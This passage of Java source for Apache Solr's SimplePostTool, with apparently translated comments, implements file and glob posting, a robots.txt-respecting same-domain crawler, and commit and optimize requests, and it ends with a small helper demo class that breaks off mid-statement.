						+ "be written to STDOUT. If auto=yes the tool will try to set type\n"
						+ "automatically from file name. When posting rich documents the\n"
						+ "file name will be propagated as \"resource.name\" and also used\n"
						+ "as \"literal.id\". You may override these or any other request parameter\n"
						+ "through the -Dparams property. To do a commit only, use \"-\" as argument.\n"
						+ "The web mode is a simple crawler following links within domain, default delay=" + DEFAULT_WEB_DELAY + "s.");
	}

	/**
	 * Post the files, folders, or glob patterns given as arguments
	 * @param args
	 * @param startIndexInArgs
	 * @param out
	 * @param type
	 * @return
	 */
	public int postFiles(String[] args, int startIndexInArgs, OutputStream out,
			String type) {
		reset();
		int filesPosted = 0;
		for (int j = startIndexInArgs; j < args.length; j++) {
			File srcFile = new File(args[j]);
			if ((srcFile.isDirectory()) && (srcFile.canRead())) {
				filesPosted += postDirectory(srcFile, out, type);
			} else if ((srcFile.isFile()) && (srcFile.canRead())) {
				filesPosted += postFiles(new File[] { srcFile }, out, type);
			} else {
				File parent = srcFile.getParentFile();
				if (parent == null)
					parent = new File(".");
				String fileGlob = srcFile.getName();
				GlobFileFilter ff = new GlobFileFilter(fileGlob, false);
				File[] files = parent.listFiles(ff);
				if ((files == null) || (files.length == 0)) {
					warn(new StringBuilder()
							.append("No files or directories matching ")
							.append(srcFile).toString());
				} else
					filesPosted += postFiles(parent.listFiles(ff), out, type);
			}
		}
		return filesPosted;
	}

	/**
	 * Post an array of files, folders, or glob patterns
	 * @param files
	 * @param startIndexInArgs
	 * @param out
	 * @param type
	 * @return
	 */
	public int postFiles(File[] files, int startIndexInArgs, OutputStream out,
			String type) {
		reset();
		int filesPosted = 0;
		for (File srcFile : files) {
			if ((srcFile.isDirectory()) && (srcFile.canRead())) {
				filesPosted += postDirectory(srcFile, out, type);
			} else if ((srcFile.isFile()) && (srcFile.canRead())) {
				filesPosted += postFiles(new File[] { srcFile }, out, type);
			} else {
				File parent = srcFile.getParentFile();
				if (parent == null)
					parent = new File(".");
				String fileGlob = srcFile.getName();
				GlobFileFilter ff = new GlobFileFilter(fileGlob, false);
				File[] fileList = parent.listFiles(ff);
				if ((fileList == null) || (fileList.length == 0)) {
					warn(new StringBuilder()
							.append("No files or directories matching ")
							.append(srcFile).toString());
				} else
					filesPosted += postFiles(fileList, out, type);
			}
		}
		return filesPosted;
	}

	/**
	 * Post all matching files in a directory
	 * @param dir
	 * @param out
	 * @param type
	 * @return  the number of files posted
	 */
	private int postDirectory(File dir, OutputStream out, String type) {
		if ((dir.isHidden()) && (!dir.getName().equals(".")))
			return 0;
		info(new StringBuilder().append("Indexing directory ")
				.append(dir.getPath()).append(" (")
				.append(dir.listFiles(this.globFileFilter).length)
				.append(" files, depth=").append(this.currentDepth).append(")")
				.toString());
		int posted = 0;
		posted += postFiles(dir.listFiles(this.globFileFilter), out, type);
		if (this.recursive > this.currentDepth) {
			for (File d : dir.listFiles()) {
				if (d.isDirectory()) {
					this.currentDepth += 1;
					posted += postDirectory(d, out, type);
					this.currentDepth -= 1;
				}
			}
		}
		return posted;
	}

	/**
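	 * Post each regular file in the array, skipping hidden files
	 * @param files
	 * @param out
	 * @param type
	 * @return number of files posted
	 */
	public int postFiles(File[] files, OutputStream out, String type) {
		int filesPosted = 0;
		for (File srcFile : files) {
			try {
				//Only post regular files that are not hidden
				if ((srcFile.isFile()) && (!srcFile.isHidden())) {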
					postFile(srcFile, out, type);
					Thread.sleep(DEFAULT_POST_DELAY);
					filesPosted++;
				}
			} catch (InterruptedException e) {
				throw new RuntimeException();
			}

		}
		return filesPosted;
	}

	/**
	 * Post index data in web mode, starting from the URLs supplied by the user
	 * @param args
	 * @param startIndexInArgs
	 * @param out
	 * @return
	 */
	public int postWebPages(String[] args, int startIndexInArgs,
			OutputStream out) {
		reset();
		LinkedHashSet<URL> s = new LinkedHashSet<URL>();
		for (int j = startIndexInArgs; j < args.length; j++) {
			try {
				URL u = new URL(normalizeUrlEnding(args[j]));
				s.add(u);
			} catch (MalformedURLException e) {
				warn(new StringBuilder()
						.append("Skipping malformed input URL: ")
						.append(args[j]).toString());
			}
		}
		//Store the URL set in the backlog
		this.backlog.add(s);
		//0 is the crawl depth; crawling starts at depth 0
		return webCrawl(0, out);
	}

	/**
	 * Normalize the ending of a URL
	 * @param link
	 * @return
	 */
	protected static String normalizeUrlEnding(String link) {
		//If the URL contains a #, keep only the part before it and drop the rest
		if (link.indexOf("#") > -1) {
			link = link.substring(0, link.indexOf("#"));
		}
		//If the URL ends with a question mark, remove it
		if (link.endsWith("?")) {
			link = link.substring(0, link.length() - 1);
		}
		//If the URL ends with a /, remove it
		if (link.endsWith("/")) {
			link = link.substring(0, link.length() - 1);
		}
		return link;
	}

	/**
	 * Crawl pages
	 * @param level  current crawl depth
	 * @param out
	 * @return
	 */
	protected int webCrawl(int level, OutputStream out) {
		int numPages = 0;
		LinkedHashSet<URL> stack = (LinkedHashSet<URL>) this.backlog.get(level);
		int rawStackSize = stack.size();
		stack.removeAll(this.visited);
		int stackSize = stack.size();
		LinkedHashSet<URL> subStack = new LinkedHashSet<URL>();
		info(new StringBuilder().append("Entering crawl at level ")
				.append(level).append(" (").append(rawStackSize)
				.append(" links total, ").append(stackSize).append(" new)")
				.toString());
		for (URL u : stack) {
			try {
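				//Record the URL as visited so the same URL is not crawled twice
				this.visited.add(u);
				//Fetch the page content as a PageFetcherResult
				PageFetcherResult result = pageFetcher.readPageFromUrl(u);
				//Status code 200 means the page was fetched successfully
				if (result.httpStatus == 200) {
					//If the page was redirected, continue with the redirect target URL
					u = result.redirectUrl != null ? result.redirectUrl : u;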
					URL postUrl = new URL(appendParam(
							this.solrUrl.toString(),
							new StringBuilder()
									.append("literal.id=")
									.append(URLEncoder.encode(u.toString(),
											"UTF-8"))
									.append("&literal.url=")
									.append(URLEncoder.encode(u.toString(),
											"UTF-8")).toString()));

					boolean success = postData(
							new ByteArrayInputStream(result.content.array(),
									result.content.arrayOffset(),
									result.content.limit()), null, out,
							result.contentType, postUrl);
					if (success) {
						info(new StringBuilder().append("POSTed web resource ")
								.append(u).append(" (depth: ").append(level)
								.append(")").toString());
						Thread.sleep(this.delay * 1000);
						numPages++;

						//If the crawl depth limit has not been reached yet
						if ((this.recursive > level)
								&& (result.contentType.equals("text/html"))) {
							//Extract the links from the fetched page
							Set<URL> children = pageFetcher.getLinksFromWebPage(
									u,
									new ByteArrayInputStream(result.content
											.array(), result.content
											.arrayOffset(), result.content
											.limit()), result.contentType,
									postUrl);
							//Add the extracted URLs to subStack, to be crawled at the next depth
							subStack.addAll(children);
						}
					} else {
						warn(new StringBuilder()
								.append("An error occurred while posting ")
								.append(u).toString());
					}
				} else {
					warn(new StringBuilder().append("The URL ").append(u)
							.append(" returned a HTTP result status of ")
							.append(result.httpStatus).toString());
				}
			} catch (IOException e) {
				warn(new StringBuilder()
						.append("Caught exception when trying to open connection to ")
						.append(u).append(": ").append(e.getMessage())
						.toString());
			} catch (InterruptedException e) {
				throw new RuntimeException();
			}
		}
		if (!subStack.isEmpty()) {
			this.backlog.add(subStack);
			numPages += webCrawl(level + 1, out);
		}
		return numPages;
	}

	public static ByteBuffer inputStreamToByteArray(BAOS bos,InputStream is)
			throws IOException {
		return inputStreamToByteArray(bos,is, 2147483647L);
	}

	/**
	 * Copy the page input stream into the output stream, which then exposes the received bytes as a ByteBuffer
	 * @param bos
	 * @param is
	 * @param maxSize
	 * @return
	 * @throws IOException
	 */
	public static ByteBuffer inputStreamToByteArray(BAOS bos,InputStream is, long maxSize)
			throws IOException {
		long sz = 0L;
		int next = is.read();
		while (next > -1) {
			if (++sz > maxSize) {
				throw new BufferOverflowException();
			}
			bos.write(next);
			next = is.read();
		}
		bos.flush();
		is.close();
		return bos.getByteBuffer();
	}

	/**
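	 * Resolves a link to an absolute URL. The href of an anchor tag may be relative,
	 * so the protocol, authority and path of baseUrl are prepended when needed.
	 * @param baseUrl URL of the page on which the link was found
	 * @param link    value extracted from the href attribute of an anchor tag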
	 * @return
	 */
	protected String computeFullUrl(URL baseUrl, String link) {
		if ((link == null) || (link.length() == 0)) {
			return null;
		}
		if (!link.startsWith("http")) {
			if (link.startsWith("/")) {
				link = new StringBuilder().append(baseUrl.getProtocol())
						.append("://").append(baseUrl.getAuthority())
						.append(link).toString();
			} else {
				if (link.contains(":")) {
					return null;
				}
				String path = baseUrl.getPath();
				if (!path.endsWith("/")) {
					int sep = path.lastIndexOf("/");
					String file = path.substring(sep + 1);
					if ((file.contains(".")) || (file.contains("?")))
						path = path.substring(0, sep);
				}
				link = new StringBuilder().append(baseUrl.getProtocol())
						.append("://").append(baseUrl.getAuthority())
						.append(path).append("/").append(link).toString();
			}
		}
		link = normalizeUrlEnding(link);
		String l = link.toLowerCase(Locale.ROOT);

		// Filter out image links
		if ((l.endsWith(".jpg")) || (l.endsWith(".jpeg"))
				|| (l.endsWith(".png")) || (l.endsWith(".gif"))) {
			return null;
		}
		return link;
	}

	/**
	 * Checks whether a MIME type is supported: it must be a value in mimeMap whose
	 * extension key is also listed in fileTypes.
	 * @param type
	 * @return
	 */
	protected boolean typeSupported(String type) {
		for (String key : mimeMap.keySet()) {
			if ((((String) mimeMap.get(key)).equals(type))
					&& (this.fileTypes.contains(key))) {
				return true;
			}
		}
		return false;
	}

	/**
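	 * Returns true when the value is a substring of "true,on,yes,1". That covers true, on, yes and 1,
	 * and also the empty string, which is why a bare -Dauto switches the option on.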
	 * @param property
	 * @return
	 */
	protected static boolean isOn(String property) {
		return "true,on,yes,1".indexOf(property) > -1;
	}

	/**
	 * Prints a warning message to stderr.
	 * @param msg
	 */
	static void warn(String msg) {
		System.err.println(new StringBuilder()
				.append("SimplePostTool: WARNING: ").append(msg).toString());
	}

	/**
	 * Prints an informational message to stdout.
	 * @param msg
	 */
	static void info(String msg) {
		System.out.println(msg);
	}

	/**
	 * Prints a fatal error message to stderr and exits with status 2.
	 * @param msg
	 */
	static void fatal(String msg) {
		System.err.println(new StringBuilder()
				.append("SimplePostTool: FATAL: ").append(msg).toString());
		System.exit(2);
	}

	/**
	 * Sends a commit request (commit=true) to the Solr update URL.
	 */
	public void commit() {
		info(new StringBuilder().append("COMMITting Solr index changes to ")
				.append(this.solrUrl).append("...").toString());
		doGet(appendParam(this.solrUrl.toString(), "commit=true"));
	}

	/**
	 * Sends an optimize request (optimize=true) to the Solr update URL.
	 */
	public void optimize() {
		info(new StringBuilder().append("Performing an OPTIMIZE to ")
				.append(this.solrUrl).append("...").toString());
		doGet(appendParam(this.solrUrl.toString(), "optimize=true"));
	}

	/**
	 * Appends query parameters given in key=value&key=value form (for example id=1&mode=files) to the URL.
	 * @param url
	 * @param param
	 * @return
	 */
	public static String appendParam(String url, String param) {
		String[] pa = param.split("&");
		for (String p : pa) {
			if (p.trim().length() != 0) {
				String[] kv = p.split("=");
				if (kv.length == 2) {
					url = new StringBuilder().append(url)
							.append(url.indexOf('?') > 0 ? "&" : "?")
							.append(kv[0]).append("=").append(kv[1]).toString();
				} else {
					warn(new StringBuilder().append("Skipping param ")
							.append(p)
							.append(" which is not on form key=value")
							.toString());
				}
			}
		}
		return url;
	}

	public void postFile(File file, OutputStream output, String type) {
		InputStream is = null;
		try {
			URL url = this.solrUrl;
			String suffix = "";
			if (this.auto) {
				if (type == null) {
					type = guessType(file);
				}
				if (type != null) {
					if ((!type.equals("application/xml"))
							&& (!type.equals("text/csv"))
							&& (!type.equals("application/json"))) {
						suffix = "/extract";
						String urlStr = appendUrlPath(this.solrUrl, suffix)
								.toString();
						if (urlStr.indexOf("resource.name") == -1) {
							// Append resource.name (the file's absolute path) to the update URL
							urlStr = appendParam(
									urlStr,
									new StringBuilder()
											.append("resource.name=")
											.append(URLEncoder.encode(
													file.getAbsolutePath(),
													"UTF-8")).toString());
						}
						if (urlStr.indexOf("literal.id") == -1) {
							// Append literal.id (also the file's absolute path) to the update URL
							urlStr = appendParam(
									urlStr,
									new StringBuilder()
											.append("literal.id=")
											.append(URLEncoder.encode(
													file.getAbsolutePath(),
													"UTF-8")).toString());
						}
						url = new URL(urlStr);
					}
				} else {
					// Unknown file type: print a warning and skip the file
					warn(new StringBuilder().append("Skipping ")
							.append(file.getName())
							.append(". Unsupported file type for auto mode.")
							.toString());
					return;
				}

			} else if (type == null) {
				// Auto-detection is off and no type was given, so fall back to DEFAULT_CONTENT_TYPE
				type = DEFAULT_CONTENT_TYPE;
			}

			info(new StringBuilder()
					.append("POSTing file ")
					.append(file.getName())
					.append(this.auto ? new StringBuilder().append(" (")
							.append(type).append(")").toString() : "")
					.append(" to [base]").append(suffix).toString());
			is = new FileInputStream(file);
			// Post the file contents
			postData(is, Integer.valueOf((int) file.length()), output, type,
					url);
		} catch (IOException e) {
			e.printStackTrace();
			warn(new StringBuilder().append("Can't open/read file: ")
					.append(file).toString());
		} finally {
			try {
				if (is != null) {
					is.close();
				}
			} catch (IOException e) {
				fatal(new StringBuilder()
						.append("IOException while closing file: ").append(e)
						.toString());
			}

		}
	}

	/**
	 * Appends a path segment to the URL while keeping its query string. For example,
	 * appending /update to http://localhost:8080/solr/core1?param1=value1&param2=value2 gives
	 *   http://localhost:8080/solr/core1/update?param1=value1&param2=value2
	 * @param url
	 * @param append
	 * @return
	 * @throws MalformedURLException
	 */
	protected static URL appendUrlPath(URL url, String append)
			throws MalformedURLException {
		return new URL(new StringBuilder()
				.append(url.getProtocol())
				.append("://")
				.append(url.getAuthority())
				.append(url.getPath())
				.append(append)
				.append(url.getQuery() != null ? new StringBuilder()
						.append("?").append(url.getQuery()).toString() : "")
				.toString());
	}

	/**
	 * Guesses the MIME type from the file name extension (null for an unknown extension).
	 * @param file
	 * @return
	 */
	protected static String guessType(File file) {
		String name = file.getName();
		String suffix = name.substring(name.lastIndexOf(".") + 1);
		return (String) mimeMap.get(suffix.toLowerCase(Locale.ROOT));
	}

	/**
	 * Sends a GET request to the URL given as a string.
	 * @param url
	 */
	public static void doGet(String url) {
		try {
			doGet(new URL(url));
		} catch (MalformedURLException e) {
			warn(new StringBuilder().append("The specified URL ").append(url)
					.append(" is not a valid URL. Please check").toString());
		}
	}
	/**
	 * Sends a GET request, adding a Basic Authorization header when the URL carries user info.
	 * @param url
	 */
	public static void doGet(URL url) {
		try {
			if (mockMode) {
				return;
			}
			HttpURLConnection urlc = (HttpURLConnection) url.openConnection();
			if (url.getUserInfo() != null) {
				String encoding = DatatypeConverter.printBase64Binary(url
						.getUserInfo().getBytes(StandardCharsets.US_ASCII));
				urlc.setRequestProperty("Authorization", new StringBuilder()
						.append("Basic ").append(encoding).toString());
			}
			// Send the request to Solr
			urlc.connect();
			// Check whether the request succeeded
			checkResponseCode(urlc);
		} catch (IOException e) {
			warn(new StringBuilder()
					.append("An error occurred posting data to ").append(url)
					.append(". Please check that Solr is running.").toString());
		}
	}

	/**
	 * Posts the data stream to the given URL and pipes Solr's response to output.
	 * @param data
	 * @param length
	 * @param output
	 * @param type
	 * @param url
	 * @return
	 */
	public boolean postData(InputStream data, Integer length,
			OutputStream output, String type, URL url) {
		if (mockMode) {
			return true;
		}
		boolean success = true;
		if (type == null)
			type = DEFAULT_CONTENT_TYPE;
		HttpURLConnection urlc = null;
		try {
			try {
				urlc = (HttpURLConnection) url.openConnection();
				try {
					// Set the HTTP method to POST
					urlc.setRequestMethod("POST");
				} catch (ProtocolException e) {
					// ProtocolException means the method could not be set on this connection; it should not occur for POST
					fatal(new StringBuilder()
							.append("Shouldn't happen: HttpURLConnection doesn't support POST??")
							.append(e).toString());
				}
				urlc.setDoOutput(true);
				urlc.setDoInput(true);
				urlc.setUseCaches(false);
				urlc.setAllowUserInteraction(false);
				urlc.setRequestProperty("Content-type", type);
				if (url.getUserInfo() != null) {
					String encoding = DatatypeConverter.printBase64Binary(url
							.getUserInfo().getBytes(StandardCharsets.US_ASCII));
					urlc.setRequestProperty(
							"Authorization",
							new StringBuilder().append("Basic ")
									.append(encoding).toString());
				}
				if (null != length)
					urlc.setFixedLengthStreamingMode(length.intValue());
				urlc.connect();
			} catch (IOException e) {
				fatal(new StringBuilder()
						.append("Connection error (is Solr running at ")
						.append(this.solrUrl).append(" ?): ").append(e)
						.toString());
				success = false;
			}
			try (OutputStream out = urlc.getOutputStream()) {
				pipe(data, out);
			} catch (IOException e) {
				fatal(new StringBuilder()
						.append("IOException while posting data: ").append(e)
						.toString());
				success = false;
			}
			try {
				success &= checkResponseCode(urlc);
				try (InputStream in = urlc.getInputStream()) {
					pipe(in, output);
				}
			} catch (IOException e) {
				warn(new StringBuilder()
						.append("IOException while reading response: ")
						.append(e).toString());
				success = false;
			}
		} finally {
			if (urlc != null) {
				urlc.disconnect();
			}
		}
		return success;
	}

	/**
	 * Decides from the response status code whether the request succeeded.
	 * @param urlc
	 * @return
	 * @throws IOException
	 */
	private static boolean checkResponseCode(HttpURLConnection urlc)
			throws IOException {
		// A status code of 400 or above means the request failed
		if (urlc.getResponseCode() >= 400) {
			warn(new StringBuilder().append("Solr returned an error #")
					.append(urlc.getResponseCode()).append(" (")
					.append(urlc.getResponseMessage()).append(") for url: ")
					.append(urlc.getURL()).toString());

			Charset charset = StandardCharsets.ISO_8859_1;
			String contentType = urlc.getContentType();

			if (contentType != null) {
				int idx = contentType.toLowerCase(Locale.ROOT).indexOf(
						"charset=");
				if (idx > 0) {
					charset = Charset.forName(contentType.substring(
							idx + "charset=".length()).trim());
				}
			}

			try (InputStream errStream = urlc.getErrorStream()) {
				if (errStream != null) {
					BufferedReader br = new BufferedReader(
							new InputStreamReader(errStream, charset));
					StringBuilder response = new StringBuilder("Response: ");
					int ch;
					while ((ch = br.read()) != -1) {
						response.append((char) ch);
					}
					warn(response.toString().trim());
				}
			}
			return false;
		}
		return true;
	}

	/**
	 * Converts a string into a UTF-8 byte input stream.
	 * @param s
	 * @return
	 */
	public static InputStream stringToStream(String s) {
		return new ByteArrayInputStream(s.getBytes(StandardCharsets.UTF_8));
	}

	/**
	 * Copies the input stream to the output stream (the data is read and discarded when dest is null).
	 * @param source
	 * @param dest
	 * @throws IOException
	 */
	private static void pipe(InputStream source, OutputStream dest)
			throws IOException {
		byte[] buf = new byte[1024];
		int read = 0;
		while ((read = source.read(buf)) >= 0) {
			if (null != dest) {
				dest.write(buf, 0, read);
			}
		}
		if (null != dest) {
			dest.flush();
		}
	}

	/**
	 * Builds a file filter from the comma-separated fileTypes list.
	 * @param fileTypes
	 * @return
	 */
	public GlobFileFilter getFileFilterFromFileTypes(String fileTypes) {
		String glob;
		if (fileTypes.equals("*")) {
			glob = ".*";
		} else {
			glob = new StringBuilder().append("^.*\\.(")
					.append(fileTypes.replace(",", "|")).append(")$")
					.toString();
		}
		return new GlobFileFilter(glob, true);
	}

	/**
	 * Selects XML nodes with an XPath expression.
	 * @param n
	 * @param xpath
	 * @return
	 * @throws XPathExpressionException
	 */
	public static NodeList getNodesFromXP(Node n, String xpath)
			throws XPathExpressionException {
		XPathFactory factory = XPathFactory.newInstance();
		XPath xp = factory.newXPath();
		XPathExpression expr = xp.compile(xpath);
		return (NodeList) expr.evaluate(n, XPathConstants.NODESET);
	}

	/**
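	 * Evaluates an XPath expression and returns the matching node values as a string.
	 * @param n
	 * @param xpath
	 * @param concatAll  true to concatenate the values of all matching nodes, false to use only the first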
	 * @return
	 * @throws XPathExpressionException
	 */
	public static String getXP(Node n, String xpath, boolean concatAll)
			throws XPathExpressionException {
		NodeList nodes = getNodesFromXP(n, xpath);
		StringBuilder sb = new StringBuilder();
		if (nodes.getLength() > 0) {
			for (int i = 0; i < nodes.getLength(); i++) {
				sb.append(new StringBuilder()
						.append(nodes.item(i).getNodeValue()).append(" ")
						.toString());
				if (!concatAll) {
					break;
				}
			}
			return sb.toString().trim();
		}
		return "";
	}

	/**
	 * Parses the bytes into a DOM Document, ready for XPath queries.
	 * @param in
	 * @return
	 * @throws SAXException
	 * @throws IOException
	 * @throws ParserConfigurationException
	 */
	public static Document makeDom(byte[] in) throws SAXException, IOException,
			ParserConfigurationException {
		InputStream is = new ByteArrayInputStream(in);
		Document dom = DocumentBuilderFactory.newInstance()
				.newDocumentBuilder().parse(is);
		return dom;
	}

	static {
		DATA_MODES.add("files");
		DATA_MODES.add("args");
		DATA_MODES.add("stdin");
		DATA_MODES.add("web");

		mimeMap = new HashMap<String, String>();
		mimeMap.put("xml", "application/xml");
		mimeMap.put("csv", "text/csv");
		mimeMap.put("json", "application/json");
		mimeMap.put("pdf", "application/pdf");
		mimeMap.put("rtf", "text/rtf");
		mimeMap.put("html", "text/html");
		mimeMap.put("htm", "text/html");
		mimeMap.put("doc", "application/msword");
		mimeMap.put("docx",
				"application/vnd.openxmlformats-officedocument.wordprocessingml.document");
		mimeMap.put("ppt", "application/vnd.ms-powerpoint");
		mimeMap.put("pptx",
				"application/vnd.openxmlformats-officedocument.presentationml.presentation");
		mimeMap.put("xls", "application/vnd.ms-excel");
		mimeMap.put("xlsx",
				"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet");
		mimeMap.put("odt", "application/vnd.oasis.opendocument.text");
		mimeMap.put("ott", "application/vnd.oasis.opendocument.text");
		mimeMap.put("odp", "application/vnd.oasis.opendocument.presentation");
		mimeMap.put("otp", "application/vnd.oasis.opendocument.presentation");
		mimeMap.put("ods", "application/vnd.oasis.opendocument.spreadsheet");
		mimeMap.put("ots", "application/vnd.oasis.opendocument.spreadsheet");
		mimeMap.put("txt", "text/plain");
		mimeMap.put("log", "text/plain");
	}

	public class PageFetcherResult {
		int httpStatus = 200;
		String contentType = "text/html";
		URL redirectUrl = null;
		ByteBuffer content;

		public PageFetcherResult() {
		}
	}

	/**
	 * Fetches web pages.
	 * @author Lanxiaowei
	 *
	 */
	class PageFetcher {
		Map<String, List<String>> robotsCache;
		final String DISALLOW = "Disallow:";

		public PageFetcher() {
			this.robotsCache = new HashMap<String, List<String>>();
		}

		/**
		 * Fetches the page at the given URL; the content is returned wrapped in a PageFetcherResult.
		 * @param u
		 * @return
		 */
		public PageFetcherResult readPageFromUrl(URL u) {
			PageFetcherResult res = new PageFetcherResult();
			try {
				/**
				 * Skip the URL if robots.txt disallows crawling it
				 */
				if (isDisallowedByRobots(u)) {
					SimplePostTool
							.warn("The URL "
									+ u
									+ " is disallowed by robots.txt and will not be crawled.");
					res.httpStatus = 403;
					SimplePostTool.this.visited.add(u);
					return res;
				}
				res.httpStatus = 404;
				HttpURLConnection conn = (HttpURLConnection) u.openConnection();
				conn.setRequestProperty("User-Agent",
						"SimplePostTool-crawler/5.1.0 (http://lucene.apache.org/solr/)");
				conn.setRequestProperty("Accept-Encoding", "gzip, deflate");
				conn.connect();
				res.httpStatus = conn.getResponseCode();
				if (!SimplePostTool
						.normalizeUrlEnding(conn.getURL().toString())
						.equals(SimplePostTool.normalizeUrlEnding(u.toString()))) {
					SimplePostTool.info("The URL " + u
							+ " caused a redirect to " + conn.getURL());
					u = conn.getURL();
					res.redirectUrl = u;
					SimplePostTool.this.visited.add(u);
				}
				if (res.httpStatus == 200) {
					String rawContentType = conn.getContentType();
					String type = rawContentType.split(";")[0];
					if (SimplePostTool.this.typeSupported(type)) {
						String encoding = conn.getContentEncoding();
						InputStream is = null;
						if ((encoding != null)
								&& (encoding.equalsIgnoreCase("gzip"))) {
							is = new GZIPInputStream(conn.getInputStream());
						} else {
							if ((encoding != null)
									&& (encoding.equalsIgnoreCase("deflate")))
								is = new InflaterInputStream(
										conn.getInputStream(), new Inflater(
												true));
							else {
								is = conn.getInputStream();
							}
						}
						BAOS bos = new BAOS();
						res.content = SimplePostTool.inputStreamToByteArray(bos,is);
						is.close();
						bos.close();
					} else {
						SimplePostTool
								.warn("Skipping URL with unsupported type "
										+ type);
						res.httpStatus = 415;
					}
				}
			} catch (IOException e) {
				SimplePostTool.warn("IOException when reading page from url "
						+ u + ": " + e.getMessage());
			}
			return res;
		}

		/**
		 * Checks against robots.txt whether the given URL must not be crawled.
		 * @param url
		 * @return
		 */
		public boolean isDisallowedByRobots(URL url) {
			String host = url.getHost();
			// Build the address of the site's robots.txt
			String strRobot = url.getProtocol() + "://" + host + "/robots.txt";
			// Look up this host's robots.txt rules in the cache first
			List<String> disallows = (List<String>) this.robotsCache.get(host);
			// Not cached yet
			if (disallows == null) {
				disallows = new ArrayList<String>();
				try {
					// Fetch robots.txt from the address built above
					URL urlRobot = new URL(strRobot);
					// Parse its Disallow rules
					disallows = parseRobotsTxt(urlRobot.openStream());
				} catch (MalformedURLException e) {
					return true;
				} catch (IOException e) {
				}
			}
			// Store the rules in the cache
			this.robotsCache.put(host, disallows);
			
			// Check whether the URL falls under a Disallow rule
			String strURL = url.getFile();
			for (String path : disallows) {
				if ((path.equals("/")) || (strURL.indexOf(path) == 0)) {
					return true;
				}
			}
			// Returning false means the URL may be crawled
			return false;
		}

		/**
		 * Parses robots.txt from the stream and collects the Disallow paths into a list, normally one rule per line.
		 * @param is
		 * @return
		 * @throws IOException
		 */
		protected List<String> parseRobotsTxt(InputStream is)
				throws IOException {
			List<String> disallows = new ArrayList<String>();
			BufferedReader r = new BufferedReader(new InputStreamReader(is,
					StandardCharsets.UTF_8));
			String l;
			while ((l = r.readLine()) != null) {
				String[] arr = l.split("#");
				if (arr.length != 0) {
					l = arr[0].trim();
					// Only Disallow rules matter here: they list the paths that must not be crawled
					if (l.startsWith("Disallow:")) {
						l = l.substring("Disallow:".length()).trim();
						if (l.length() != 0) {
							disallows.add(l);
						}
					}
				}
			}
			is.close();
			return disallows;
		}

		/**
		 * Extracts the links from the content of a fetched page.
		 * @param u
		 * @param is
		 * @param type
		 * @param postUrl
		 * @return
		 */
		protected Set<URL> getLinksFromWebPage(URL u, InputStream is,
				String type, URL postUrl) {
			Set<URL> l = new HashSet<URL>();
			URL url = null;
			try {
				ByteArrayOutputStream os = new ByteArrayOutputStream();
				URL extractUrl = new URL(SimplePostTool.appendParam(
						postUrl.toString(), "extractOnly=true"));
				boolean success = SimplePostTool.this.postData(is, null, os,
						type, extractUrl);
				if (success) {
					Document d = SimplePostTool.makeDom(os.toByteArray());
					String innerXml = SimplePostTool.getXP(d,
							"/response/str/text()[1]", false);
					d = SimplePostTool.makeDom(innerXml
							.getBytes(StandardCharsets.UTF_8));
					// This XPath selects the href attribute of every a tag under html/body
					NodeList links = SimplePostTool.getNodesFromXP(d,
							"/html/body//a/@href");
					for (int i = 0; i < links.getLength(); i++) {
						String link = links.item(i).getTextContent();
						link = SimplePostTool.this.computeFullUrl(u, link);
						if (link != null) {
							url = new URL(link);
							if ((url.getAuthority() != null)
									&& (url.getAuthority().equals(u
											.getAuthority()))) {
								l.add(url);
							}
						}
					}
				}
			} catch (MalformedURLException e) {
				SimplePostTool.warn("Malformed URL " + url);
			} catch (IOException e) {
				SimplePostTool.warn("IOException opening URL " + url + ": "
						+ e.getMessage());
			} catch (Exception e) {
				throw new RuntimeException(e);
			}
			return l;
		}
	}

	/**
	 * Custom file filter.
	 * @author Lanxiaowei
	 *
	 */
	class GlobFileFilter implements FileFilter {
		private String _pattern;
		private Pattern p;

		/**
		 * isRegex tells whether the first argument, pattern, is already a regular expression.
		 * @param pattern
		 * @param isRegex
		 */
		public GlobFileFilter(String pattern, boolean isRegex) {
			this._pattern = pattern;
			// If pattern is not a regular expression
			if (!isRegex) {
				// Treat it as a glob: escape the regex metacharacters, then map * to .* and ? to .
				this._pattern = this._pattern.replace("^", "\\^")
						.replace("$", "\\$").replace(".", "\\.")
						.replace("(", "\\(").replace(")", "\\)")
						.replace("+", "\\+").replace("*", ".*")
						.replace("?", ".");
				// Anchor the result with ^ and $ so that it has to match the whole file name
				this._pattern = ("^" + this._pattern + "$");
			}
			try {
				// Match case-insensitively
				this.p = Pattern.compile(this._pattern, Pattern.CASE_INSENSITIVE);
			} catch (PatternSyntaxException e) {
				SimplePostTool.fatal("Invalid type list " + pattern + ". "
						+ e.getDescription());
			}
		}
		/** Accepts the file when its name matches the regular expression. */
		public boolean accept(File file) {
			return this.p.matcher(file.getName()).find();
		}
	}

	/**
	 * Custom byte output stream.
	 * @author Administrator
	 *
	 */
	public static class BAOS extends ByteArrayOutputStream {
		// Wraps the internal buffer in a ByteBuffer without copying it, unlike toByteArray(), which allocates a new array
		public ByteBuffer getByteBuffer() {
			return ByteBuffer.wrap(this.buf, 0, this.count);
		}
	}
}
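
The `isOn` and `appendParam` helpers in the source above are easy to misread, so here is a small stand-alone sketch for experimenting with them. It copies their logic into a hypothetical class, `PostToolParamsDemo`, which is not part of post.jar. `isOnStrict` is an illustrative variant of my own, and the URL in `main` is only a placeholder.

```java
import java.util.Locale;

/** Stand-alone copies of two SimplePostTool helpers, for experimentation only. */
final class PostToolParamsDemo {

    // Same substring test as SimplePostTool.isOn.
    static boolean isOn(String property) {
        return "true,on,yes,1".indexOf(property) > -1;
    }

    // Hypothetical stricter variant (not in post.jar): exact, case-insensitive match.
    // The empty string stays "on" so that a bare -Dauto would keep working.
    static boolean isOnStrict(String property) {
        if (property == null) {
            return false;
        }
        switch (property.trim().toLowerCase(Locale.ROOT)) {
            case "":
            case "true":
            case "on":
            case "yes":
            case "1":
                return true;
            default:
                return false;
        }
    }

    // Same logic as SimplePostTool.appendParam, without the warning output.
    static String appendParam(String url, String param) {
        for (String p : param.split("&")) {
            if (p.trim().length() == 0) {
                continue;
            }
            String[] kv = p.split("=");
            if (kv.length == 2) {
                url = url + (url.indexOf('?') > 0 ? "&" : "?") + kv[0] + "=" + kv[1];
            }
            // Anything that does not split into exactly key and value is skipped.
        }
        return url;
    }

    public static void main(String[] args) {
        System.out.println(isOn(""));    // empty value, as set by a bare -Dauto
        System.out.println(isOn("n"));   // substring of "on"
        System.out.println(isOn("no"));  // not a substring
        System.out.println(appendParam(
                "http://localhost:8983/solr/demo/update", "commit=true&x=1"));
        System.out.println(appendParam(
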